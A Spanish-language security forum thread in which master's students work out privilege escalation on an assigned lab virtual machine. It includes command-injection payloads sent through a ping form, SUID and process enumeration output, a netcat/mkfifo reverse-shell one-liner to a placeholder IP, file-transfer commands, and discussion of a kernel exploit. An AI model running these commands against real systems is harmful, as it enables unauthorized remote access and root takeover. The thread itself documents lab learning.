Hack x Crack - Comunidad de Seguridad informática

Seguridad Informatica => Hacking => Mensaje iniciado por: sepax en Abril 23, 2018, 10:11:55 am

Título: Escalado de privilegios
Publicado por: sepax en Abril 23, 2018, 10:11:55 am
Buenas,

Estoy cursando un master de seguridad informática, donde con Kali linux debemos explotar una maquina virtual que nos dan ellos y realizar un escalado de privilegios.

cuando accedes a la página web de la máquina hay un servicio que te ofrecen que es el realizar un ping a la ip que le pases. Por lo que te das cuenta que puedes explotar esa máquina siguiendo los siguientes pasos https://www.offensive-security.com/metasploit-unleashed/web-delivery/

La cosa es que posteriormente se me pide un escalado de privilegios. Es en el punto que me he quedado.
la máquina explotada es un linux 4.4.0-87
el usuario con el que me encuentro en la shell es www-data

¿como puedo llegar a hacer un escalado de privilegios?
Título: Re:Escalado de privilegios
Publicado por: animanegra en Abril 23, 2018, 03:53:23 pm
La via suele ser, primero mirar si tienes la puerta abierta. Haces sudo por siacaso. Qué no suele ser, despues haces una busqueda por Los commandos con el set user id a 1. Normalmente Los scripts k se ponen asi, suelen dar problems porque muchos no se Han verificado correctamente contra command injection. Si no es el caso, tendras k ir a buscar fallos en programas concretos k te permitan hacer una ejecucion de commando en algo qué tenga root via exploits concretos.
Título: Re:Escalado de privilegios
Publicado por: sepax en Abril 24, 2018, 08:39:50 am
muchas gracias, voy a seguir tu consejo,

para seguir aprendiendo sobre metasploit, ¿me recomendáis alguno de estos libros?

https://0xword.com/es/buscar?controller=search&orderby=position&orderway=desc&search_query=metasploit&submit_search=Buscar (https://0xword.com/es/buscar?controller=search&orderby=position&orderway=desc&search_query=metasploit&submit_search=Buscar)
Título: Re:Escalado de privilegios
Publicado por: animanegra en Abril 24, 2018, 11:08:23 am
Yo no he hablado nada de usar metasloit. No obstante, bajo mi punto de vista, los libros de 0xword son un poco básicos (Al menos los que me he mirado yo). Si no sabes nada de metasploit estan bien, pero a nada que sepas un poco manejarlo y hayas trasteado creo que se te van a quedar cortos. Eso si, estan muy bien escritos y creo que merece la pena incentivar a que sigan generando contenido comprandoles libros. Si tienes dudas, siempre tienes la opcion de descargarte el libro y si ves que le das uso y es lo que esperabas comprarlo.
Título: Re:Escalado de privilegios
Publicado por: sepax en Abril 24, 2018, 03:09:29 pm
El tema de metasploit viene de la tarea anterior a la de realizar el escalado de privilegios, donde acabas realizando con meterpreter un comand injection para lanzar una shell.

Ya que por lo que me han enseñado y dicho, para metasploit se puede hacer un curso entero solo dedicado a ello.

Entonces estaba pensando en algún libro o portal para aprender metasploit avanzado
Título: Re:Escalado de privilegios
Publicado por: WatchAndLearn en Abril 28, 2018, 06:25:53 pm
Hola, un escalado de privilegios es obtener un usuario con mayores privilegios, en Meterpreter puedes obtenerlo con el comando GetSystem de otro modo sería buscar un servicio vulnerable y ejecutar un exploit para el Kernel y obterner root.
Ref:https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Si no me equivoco esa es la respuesta. Hace años que no leo sobre el tema pero debe haber otros métodos nuevos.
Salu2
Título: Re:Escalado de privilegios
Publicado por: sepax en Abril 30, 2018, 12:49:50 pm
Es una de las tareas que he probado, getsystem es la primera pero nada, falla.
posteriormente también he realizado subiendo exploits y ejecuntando los scripts y tampoco.
He encontrado un servicio que contiene en var/www/html/... un .htpasswd donde está usuario:contraseña cifrada $apr1$... Pero no consigo descifrarla al lanzar hashcat o john nada...
creo que es un md5 apache el algoritmo.

creo que me voy a rendir y preguntarle al tutor para alguna pista.

mi duda también es: ¿exploit/windows/local/ son exploits que se lanzan contra windows o valen para linux también?
Título: Re:Escalado de privilegios
Publicado por: animanegra en Mayo 01, 2018, 01:41:20 pm
los exploits de la sección de windows son de windows. No te van a funcionar en un entorno linux. ¿Has comprobado los scripts con set user id a 1 que tiene el sistema?
Título: Re:Escalado de privilegios
Publicado por: sepax en Mayo 07, 2018, 11:21:00 am
Buenas es una de las pruebas que tenía realizado y nada.

He probado con el exploit dirtycow, pero se queda como bloqueado, y tengo que quitar la shell.

se trata de un ubuntu 16.04 y de kernel un linux 4.4.0-87 generic. Creo que la vulnerabilidad para escalar privilegios está en el apache james server 2.3.2.1

Lo malo que parece ser que esa versión arregla la vulnerabilidad de la versión 2.3.2

entonces sigo investigando, me lo ponen muy difícil para estar en proceso de aprendizaje (me gusta).
Título: Re:Escalado de privilegios
Publicado por: animanegra en Mayo 07, 2018, 04:18:50 pm
¿¿¿Has mirado los scripts o programas con el setuid a 1??? Si yo pusiese un entorno para aprender pondria cosas que reflejasen que la gente sabe algo más que simplemente probar exploits ya trillados y automatizados. Pero bueno, es solo un punto de vista.
Título: Re:Escalado de privilegios
Publicado por: zenna en Junio 12, 2018, 01:41:18 am
Un libro genial para entrar en este mundillo es La 2° edicion del libro Metaexploits para Pentesting de la editorial 0xWord.
https://www.bibliadelprogramador.com/2017/07/metasploit-para-pentesters-2-edicion.html
En esta pagina se pueden descargar gratuitamente.
Saludos
Título: Re:Escalado de privilegios
Publicado por: javisanz en Febrero 14, 2019, 11:04:35 am
¿¿¿Has mirado los scripts o programas con el setuid a 1??? Si yo pusiese un entorno para aprender pondria cosas que reflejasen que la gente sabe algo más que simplemente probar exploits ya trillados y automatizados. Pero bueno, es solo un punto de vista.

Estoy en el mismo caso que el compañero, he conseguido la lista de procesos que se están ejecutando como root y los scrip(programas que tienen el permiso 'S', pero no se muy bien como escalar los privilegios.

Tengo que conseguir 10 FLAG, ya tengo 9 pero el ultimo está en la carpeta /root a la que evidentemente no puedo acceder siendo www-data.

Muchas gracias de antemano!!
Título: Re:Escalado de privilegios
Publicado por: animanegra en Febrero 14, 2019, 11:22:28 am
Yo echaría un vistazo debajo de la capota. Si son scripts, diréctamente mira a ver si hacen algún temporal, tienen algún tipo de directory transversal, o si utilizan algun * con el que si haces un touch con menos puedes pasar parámetros al comando que se ejecuta como root.  Mira tambien con ltrace-strace para ver si simplemente hacen una llamada a un programa concreto que con un cambio de PATH y haciendo un script con un cat /root/flag te de directamente el flag. Si no, tendras que mirar si tiene algun tipo de buffer overflow o similares que puedas explotar haciendo un salto a system o ejecutando algo que dejes en el buffer.

Sobre todo mira programas que no sean "tipicos" del entorno linux, que den pie a pensar que tiene suid pero que los ha programado algun administrador de sistemas malo. Por ejemplo, el comando su siempre va a tener setuid, pero probablemente no puedas explotarlo porque no tenga fallo. Pero un programa llamado "actualizaUsuarios" tiene pinta de que podría tener errores.
Título: Re:Escalado de privilegios
Publicado por: javisanz en Febrero 14, 2019, 01:15:14 pm
Muchas gracias por la respuestas! esta tarde intento tirar por ahí, ya te contaré :D
Título: Re:Escalado de privilegios
Publicado por: animanegra en Febrero 14, 2019, 06:34:54 pm
animos
Título: Re:Escalado de privilegios
Publicado por: javisanz en Febrero 14, 2019, 11:09:28 pm
es oficial... estoy perdido jajaja

Se trata de una web donde puedes hacer ping pasandole la ip por un parámetro get (todo un clasico)... esto es lo que tengo despues de lanzar algunos comandos, no se si me sirve de algo, es mi primer caso de escalada :(

Se ha recibido la IP ;find / -perm -u=s -type f 2>/dev/null
Iniciando ping...
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/bin/cat
/bin/mount
/bin/su
/bin/ping6
/bin/ntfs-3g
/bin/ping
/bin/umount
/bin/fusermount
/bin/fusermount


Se ha recibido la IP ;ls -la /etc/cron.d
Iniciando ping...
total 20
drwxr-xr-x  2 root root 4096 Dec  7  2017 .
drwxr-xr-x 93 root root 4096 Dec  9  2017 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  670 Mar  1  2016 php
-rw-r--r--  1 root root  190 Dec  7  2017 popularity-contest
-rw-r--r--  1 root root  190 Dec  7  2017 popularity-contest


Se ha recibido la IP ;ps -aux | grep root
Iniciando ping...
root         1  0.0  0.2  37696  5704 ?        Ss   11:53   0:02 /sbin/init recovery noprompt --startup-event=recovery
root         2  0.0  0.0      0     0 ?        S    11:53   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    11:53   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   11:53   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    11:53   0:00 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    11:53   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    11:53   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    11:53   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    11:53   0:00 [kdevtmpfs]
root        12  0.0  0.0      0     0 ?        S<   11:53   0:00 [netns]
root        13  0.0  0.0      0     0 ?        S<   11:53   0:00 [perf]
root        14  0.0  0.0      0     0 ?        S    11:53   0:00 [khungtaskd]
root        15  0.0  0.0      0     0 ?        S<   11:53   0:00 [writeback]
root        16  0.0  0.0      0     0 ?        SN   11:53   0:00 [ksmd]
root        17  0.0  0.0      0     0 ?        SN   11:53   0:00 [khugepaged]
root        18  0.0  0.0      0     0 ?        S<   11:53   0:00 [crypto]
root        19  0.0  0.0      0     0 ?        S<   11:53   0:00 [kintegrityd]
root        20  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        21  0.0  0.0      0     0 ?        S<   11:53   0:00 [kblockd]
root        22  0.0  0.0      0     0 ?        S<   11:53   0:00 [ata_sff]
root        23  0.0  0.0      0     0 ?        S<   11:53   0:00 [md]
root        24  0.0  0.0      0     0 ?        S<   11:53   0:00 [devfreq_wq]
root        26  0.0  0.0      0     0 ?        S    11:53   0:00 [kworker/0:1]
root        28  0.0  0.0      0     0 ?        S    11:53   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        S<   11:53   0:00 [vmstat]
root        30  0.0  0.0      0     0 ?        S    11:53   0:00 [fsnotify_mark]
root        31  0.0  0.0      0     0 ?        S    11:53   0:00 [ecryptfs-kthrea]
root        47  0.0  0.0      0     0 ?        S<   11:53   0:00 [kthrotld]
root        48  0.0  0.0      0     0 ?        S<   11:53   0:00 [acpi_thermal_pm]
root        49  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        50  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        51  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        52  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        53  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        54  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        55  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        56  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root        60  0.0  0.0      0     0 ?        S<   11:53   0:00 [ipv6_addrconf]
root        73  0.0  0.0      0     0 ?        S<   11:53   0:00 [deferwq]
root        74  0.0  0.0      0     0 ?        S<   11:53   0:00 [charger_manager]
root       118  0.0  0.0      0     0 ?        S<   11:53   0:00 [kpsmoused]
root       121  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_0]
root       122  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_0]
root       123  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_1]
root       124  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_1]
root       125  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_2]
root       126  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_2]
root       127  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_3]
root       128  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_3]
root       129  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_4]
root       130  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_4]
root       131  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_5]
root       132  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_5]
root       133  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_6]
root       134  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_6]
root       135  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_7]
root       136  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_7]
root       137  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_8]
root       138  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_8]
root       139  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_9]
root       140  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_9]
root       141  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_10]
root       142  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_10]
root       143  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_11]
root       144  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_11]
root       145  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_12]
root       146  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_12]
root       147  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_13]
root       148  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_13]
root       149  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_14]
root       150  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_14]
root       151  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_15]
root       152  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_15]
root       153  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_16]
root       154  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_16]
root       155  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_17]
root       156  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_17]
root       157  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_18]
root       158  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_18]
root       159  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_19]
root       160  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_19]
root       161  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_20]
root       162  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_20]
root       163  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_21]
root       164  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_21]
root       165  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_22]
root       166  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_22]
root       167  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_23]
root       168  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_23]
root       169  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_24]
root       170  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_24]
root       171  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_25]
root       172  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_25]
root       173  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_26]
root       174  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_26]
root       175  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_27]
root       176  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_27]
root       177  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_28]
root       178  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_28]
root       179  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_29]
root       180  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_29]
root       204  0.0  0.0      0     0 ?        S<   11:53   0:00 [mpt_poll_0]
root       206  0.0  0.0      0     0 ?        S<   11:53   0:00 [mpt/0]
root       210  0.0  0.0      0     0 ?        S    11:53   0:00 [kworker/u2:29]
root       213  0.0  0.0      0     0 ?        S    11:53   0:00 [scsi_eh_30]
root       214  0.0  0.0      0     0 ?        S<   11:53   0:00 [scsi_tmf_30]
root       215  0.0  0.0      0     0 ?        S<   11:53   0:00 [bioset]
root       247  0.0  0.0      0     0 ?        S<   11:53   0:00 [kworker/0:1H]
root       270  0.0  0.0      0     0 ?        S    11:53   0:00 [jbd2/sda1-8]
root       271  0.0  0.0      0     0 ?        S<   11:53   0:00 [ext4-rsv-conver]
root       323  0.0  0.1  29648  3512 ?        Ss   11:53   0:00 /lib/systemd/systemd-journald
root       327  0.0  0.0      0     0 ?        S    11:53   0:00 [kauditd]
root       361  0.0  0.1  44288  3612 ?        Ss   11:53   0:00 /lib/systemd/systemd-udevd
root       664  0.0  0.0      0     0 ?        S<   11:53   0:00 [iprt-VBoxWQueue]
root       782  0.0  0.0  16124   864 ?        Ss   11:53   0:00 dhclient -1 enp0s3
root      1056  0.0  0.0  20100  1132 ?        Ss   11:54   0:00 /lib/systemd/systemd-logind
root      1070  0.0  0.3 275860  6164 ?        Ssl  11:54   0:00 /usr/lib/accountsservice/accounts-daemon
root      1082  0.0  0.1  29008  2988 ?        Ss   11:54   0:00 /usr/sbin/cron -f
root      1162  0.0  0.2  65520  5296 ?        Ss   11:54   0:00 /usr/sbin/sshd -D
root      1186  0.0  0.1  24044  2452 ?        Ss   11:54   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root      1211  0.0  0.0  15940  1748 tty1     Ss+  11:54   0:00 /sbin/agetty --noclear tty1 linux
root      1213  0.0  1.2 225980 25456 ?        Ss   11:54   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root      1223  0.0  1.2 262616 25188 ?        Ss   11:54   0:00 /usr/sbin/apache2 -k start
root      1295  0.0  0.1  50220  2944 ?        S    11:55   0:00 /usr/sbin/CRON -f
root      1296  0.0  0.0   4508   764 ?        Ss   11:55   0:00 /bin/sh -c /opt/james-2.3.2.1/bin/run.sh
root      1297  0.0  0.0   4508   856 ?        S    11:55   0:00 /bin/sh /opt/james-2.3.2.1/bin/run.sh
root      1301  0.1  3.3 2493804 69152 ?       Sl   11:55   0:09 /usr/lib/jvm/default-java/bin/java -Djava.ext.dirs=/opt/james-2.3.2.1/lib:/opt/james-2.3.2.1/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2.1/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2.1 -Djava.io.tmpdir=/opt/james-2.3.2.1/temp -jar /opt/james-2.3.2.1/bin/phoenix-loader.jar
root      2112  0.0  0.0      0     0 ?        S    12:08   0:01 [kworker/0:0]
root      3293  0.0  0.0      0     0 ?        S    12:24   0:00 [kworker/u2:0]
www-data  6166  0.0  0.0   4508   752 ?        S    13:18   0:00 sh -c ping -c 4 ;ps -aux | grep root
www-data  6169  0.0  0.0  11284   932 ?        S    13:18   0:00 grep root
www-data  6169  0.0  0.0  11284   932 ?        S    13:18   0:00 grep root
Título: Re:Escalado de privilegios
Publicado por: javisanz en Febrero 14, 2019, 11:11:45 pm
al igual que el compañero anterior, he subido un exploit para intentar un overflow  ->  https://www.exploit-db.com/exploits/44298 <- está en la carpeta /tmp pero no me deja compilarlo u.u

un saludo y gracias!!!
Título: Re:Escalado de privilegios
Publicado por: animanegra en Febrero 15, 2019, 10:06:07 am
primero consigue una shel:

Ejecuta esto en tu ordenador:

Código: [Seleccionar]

nc -l -p PUERTO


Y ejecuta este comando en el remoto a través de la inyeccion de comandos que ya estás usando:

Código: [Seleccionar]

mkfifo /tmp/lalala; nc IP PUERTO < /tmp/lalala | /bin/bash > /tmp/lalala;


O haz la conexion en orden inverso si te deja. Y a partir de ahi ya trasteas con una consola y no cargando una página.

PD: no he comprobado los comandos, pero si hay algun error de sintaxis creo que se ve la idea claramente.
PD2: El exploit solo funciona en Linux Kernel < 4.4.0-116, ¿Has comprobado que tenga esa version del kernel? Si no tienes consola remota, al ejecutar la elevacion local y conseguir root ¿de que sirve? En la siguiente peticion volverías a ser www-data y no root.
Título: Re:Escalado de privilegios
Publicado por: javisanz en Febrero 15, 2019, 11:14:37 pm
al final he conseguido un shell remoto con nc y usando la herramienta commix (resverse_tcp) poniendo ip y puerto.

Respecto al kernel, si, tengo 4.4.0-87 (80 y algo... te digo de memoria), puedo colocar el exploit en tmp con wget pero no me deja ejecutar gcc así que game over jajaja

y hasta aquí mis aventuras de hoy..

pd: sudo -s, tampoco cuela
Título: Re:Escalado de privilegios
Publicado por: animanegra en Febrero 18, 2019, 11:21:33 am
¿Game over por que? Compilalo en local y súbelo al equipo para ejecutarlo.
Título: Re:Escalado de privilegios
Publicado por: javisanz en Febrero 21, 2019, 05:37:16 pm
Muy buenas!

Perdona el retraso, esta semana estuve algo liado hoy he seguido tu consejo y ¡¡HA FUNCIONADO!!

Al final compilé el exploit en kali, lo subí a la maquina virtual con wget (a la carpeta /tmp), añadir perdisos chmod 777 y ejecutar BANG!!

Muchísimas gracias por los consejos y las pistas!!

Título: Re:Escalado de privilegios
Publicado por: animanegra en Febrero 21, 2019, 05:52:16 pm
Para eso estamos. A mandar!! :D Happy hacking
Título: Re:Escalado de privilegios
Publicado por: joops en Mayo 27, 2019, 01:18:17 pm
Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

Muchas gracia
Título: Re:Escalado de privilegios
Publicado por: sancand en Mayo 28, 2019, 10:56:02 pm
Muy buenas!

Perdona el retraso, esta semana estuve algo liado hoy he seguido tu consejo y ¡¡HA FUNCIONADO!!

Al final compilé el exploit en kali, lo subí a la maquina virtual con wget (a la carpeta /tmp), añadir perdisos chmod 777 y ejecutar BANG!!

Muchísimas gracias por los consejos y las pistas!!

Buenas he llegado a compilar el exploit, https://www.exploit-db.com/download/44298, subido a la máquina objetivo (carpeta /tmp), cambiado permisos...
pero en el momento de ejecutar me indica Invalid argument. ¿Alguna idea? Soy muy nuevo en el mundo del hacking ético...y poco menos en Linux :-(

Gracias!
Título: Re:Escalado de privilegios
Publicado por: sancand en Mayo 28, 2019, 10:59:30 pm
Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

Muchas gracia

Los pasos que he hecho yo... mediante gcc compilar el exploit para generar el ejecutable; desde Kali activar apache y copiar el ejecutable en la ruta /var/www/html
y desde la shell (alguna carpeta con permisos, p.e. /tmp) wget ip_kali/nombre_ejecutable...pero ahí me he quedado yo :-(
Título: Re:Escalado de privilegios
Publicado por: animanegra en Mayo 29, 2019, 10:12:01 am
en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

¿Has probado a compilar el exploit de forma estática?

Citar
Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

Para copiar un archivo de remoto a local tienes muchas opciones, desde un wget como te comentan, un scp si tiene instalado, utilizando netcat y una redireccion (ejecutas en tu equipo: nc -l -p PUERTO < archivo.exe y en el otro: nc TUIP PUERTO > archivo.exe). Puedes tambien abrir una consola ejecutar "cat archivo.exe | base64" y copiar y pegar de la consola para luego en la máquina remota donde tienes  que poner "echo 'TEXTOCOPIADO' | base64 -d". Hay más opciones, pero estas son unas cuantas.
Título: Re:Escalado de privilegios
Publicado por: sancand en Mayo 29, 2019, 11:29:44 am
en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

¿Has probado a compilar el exploit de forma estática?


Acabo de probar ahora (poniendo -static cuando ejecuto gcc...entiendo que es esto) y el resultado ha sido el mismo :-(
Para ejecutar el exploit entiendo que desde la shell que tengo sobre la máquina a la que ataco únicamente tengo que indicar ./nombre_fichero, no? Si es así, me sigue indicando el mismo error; no se si aparte tengo que poner algún parametro

Gracias!
Título: Re:Escalado de privilegios
Publicado por: animanegra en Mayo 29, 2019, 02:51:54 pm
Citar
únicamente tengo que indicar ./nombre_fichero, no?

Pues no se, mira la documentación del exploit específico. Pero normalmente un exploit de local privilege escalation te permite estando en el ordenador en una consola ejecutar el comando y que te abra una consola de administrador desde la que ejecutar comandos como superusuario.

¿Lo has compilado en el mismo kernel que la máquina objetivo? Mismo procesaor, etc... el exploit ese me suena que era solo para un kernel concreto y para 64 bits.
Título: Re:Escalado de privilegios
Publicado por: marta202 en Julio 18, 2019, 08:12:39 pm
Hola estoy en la misma situación que los compañeros anteriores. He conseguido una Shell y necesito pasar a root. Llevare como 100h intentandolo y ya estoy desesperado. Efectivamente, la maquina es un Ubuntu 4.4.0-87  16.04.4.

He probado de todo y no hay manera. También he probado con el exploit 44298 y también me da el mismo problema "Invalid Argument".

Revisando el código veo lo siguiente:

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

Entiendo que como el kernel es 4.4.0-87 debería cambiar esos parametros pero sinceramente, no se ni que son... como podria saber que paramentros corresponden a mi kernel? Probaria algun otro script, pero me estoy quedando sin tiempo y sin ideas.

Gracias!
Título: Re:Escalado de privilegios
Publicado por: r3ddit3 en Noviembre 24, 2019, 04:31:30 pm
Tengo un problema similar al nombrado. Tengo la máquina victima y kali. En kali tengo un apache2 corriendo con el exploit guardado en /var/www/html/ y al tratar de hacer el wget con la maquina victima me aparece read only file system.
Aclarar que el archivo ya tiene chmod 777 y el wget lo ejecuto desde temp el cual tiene privilegios totales también.

Alguna idea?